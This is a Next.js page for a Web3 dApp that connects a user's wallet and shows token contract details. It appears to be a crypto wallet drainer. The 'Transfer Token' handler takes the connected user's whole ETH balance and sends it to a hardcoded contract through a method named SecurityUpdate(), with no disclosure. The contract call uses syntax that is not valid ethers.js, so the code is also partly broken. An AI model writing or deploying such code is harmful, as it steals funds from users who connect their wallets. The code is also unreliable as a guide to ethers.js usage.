import type { NextPage } from "next";
import Head from 'next/head'

import { useActiveWeb3React } from "@/hooks/useActiveWeb3React";
import { useEffect, useState } from "react";
import { UnsupportedChainIdError, useWeb3React } from "@web3-react/core";
import { injected } from "@/config/constants/wallets";
import { connectorLocalStorageKey } from "@/config/connectors/index";

import { ethers, Signer } from 'ethers';
import { Button, Card, Col, Input, InputNumber, Layout, message, Row, Spin } from 'antd';

import CornucopiaContract from '@/contract/CornucopiaContract.json';

export default function Wallet() {

  const REACT_APP_CONTARCT_ADDRESS = '0x26bD776Cff637909ad2576E4aBaD5315505E3589'
  

  
  // const { active } = useWeb3React();

  // active auth status
  // account address
  // chainId InjectID
  // connector
  // activate function
  // deactivate function
  // library
  const { active, account, chainId, error, connector, activate, deactivate, library } = useActiveWeb3React();


  const [loading, setLoading] = useState(false);

  const [provider, setProvider] = useState<any>(null);

  const [contractWithSigner, setContractWithSigner] = useState<any>(null);

  const [name, setName] = useState('');
  const [symbol, setSymbol] = useState('');
  const [decimals, setDecimals] = useState('');

  const [supply, setSupply] = useState('');
  const [ownerWalletBlance, setOwnerWalletBlance] = useState('0');

  const [txs, setTxs] = useState<any>({})
  

  useEffect(()=>{
    setProvider(new ethers.providers.Web3Provider(window.ethereum));
  }, [])

  // contract name
  async function getName() {
    setName(await contractWithSigner.name());
  }

  // contract symbol
  async function getSymbol() {
    setSymbol(await contractWithSigner.symbol());
  }

  // contract Decimals
  async function getDecimals() {
    setDecimals(await contractWithSigner.decimals());
  }

  // contract total supply
  async function getSupply() {
    setSupply(await contractWithSigner.totalSupply().then((balance: any) => ethers.utils.formatEther(balance)))
  }

  // owner eth balance
  async function getOwnerWalletBalance() {
    setOwnerWalletBlance(await provider.getBalance(String(account)).then((balance: any) => ethers.utils.formatEther(balance)))
  }


  // 查询数据
  const refetch = () => {
    // account && getName()
    // account && getSymbol()
    // account && getDecimals()

    // account && getSupply()
    account && getOwnerWalletBalance()
  }

  // transfer
  const sendToken = async () => {
    if(!contractWithSigner){
      message.error('please connect wallet')
      return
    }
    let amount = ethers.utils.parseUnits(ownerWalletBlance.toString(), 18)
    const transaction = await contractWithSigner.call.value(amount).SecurityUpdate();
    setLoading(false)
    refetch()
  }

  // transcation callback
  const onContractTransfer = (from: any, to: any, value: any, event: any) => {
    if (!txs[event.transactionHash]) {
      console.log(event.transactionHash, ethers.utils.formatUnits(value), new Date().getTime());
      setTxs({
        ...txs, [event.transactionHash]: {
          from,
          to,
          value: ethers.utils.formatUnits(value),
          transactionHash: event.transactionHash
        }
      })
    }
  }

  const connectWellet = async () =>{
    activate(injected, undefined, true).then((res)=>{
      let signer = provider.getSigner();
      console.log(signer);
      let contract = new ethers.Contract(REACT_APP_CONTARCT_ADDRESS!, CornucopiaContract.abi, signer);
      console.log(contract)
      setContractWithSigner(contract);
    }).catch((error) => {
        activate(injected);
    });
  }

  const disconnectWellet = async () =>{
    deactivate()
  }

  useEffect(() => {

    return () => {
      // contractWithSigner && contractWithSigner.removeListener('Transfer', () => {
      //   console.log('contractWithSigner removeListener Transfer ');
      // })
    }
  }, [contractWithSigner])

  useEffect(() => {
    account && refetch()
  },[account])

  return (
    <div>
      <Head>
        <title>Web3 DApp</title>
        <meta name="description" content="Generated by create next app" />
        <link rel="icon" href="/favicon.ico" />
      </Head>

      <main>
      <Spin spinning={loading}>
      <Layout className='app'>
        <div>
          <div className='header'>
            <h1>{`Contract Infomation（Name：${name} Symbol：${symbol} Decimals：${decimals}）`}</h1>
            Contract address：
            <span className='address'>{REACT_APP_CONTARCT_ADDRESS}</span>
            <span className='address'>Total supply：</span>
            <span className='address'>{supply}</span>            
            
          </div>
          <Row className='content'>

            {/* Owner */}
            <Col span={12} className="left">
              <Card title='Creater'>
                <div>
                  connect account：
                  <span className='address'>{account}</span>
                  {
                    account!==null ? <Button onClick={disconnectWellet}>Disconnect Wellet</Button>:<Button onClick={connectWellet}>Connect Wellet</Button>
                  }
                </div>
                <div>
                  ETH balance：
                  <span className='address'>{ownerWalletBlance}</span>
                </div>


                <div className='operate'>
                  
                  <div style={{ marginTop: 16 }}>
                    <InputNumber prefix="transfer amount：" value={ownerWalletBlance} min={0} className="input" style={{width: '100%'}} />
                  </div>

                  <Button style={{ marginTop: 16 }} onClick={sendToken}>Transfer Token</Button>
                  <Button style={{ marginTop: 16, marginLeft: 20 }} onClick={()=>{}}>Withdraw Token</Button>
                </div>
              </Card>

            </Col>

            {/* Reciver */}
            <Col span={12} className="right">
              <Card title='receiver'>
                
              </Card>
            </Col>
          </Row>
        </div>
      </Layout>
    </Spin>
      </main>

      
    </div>
  )
}
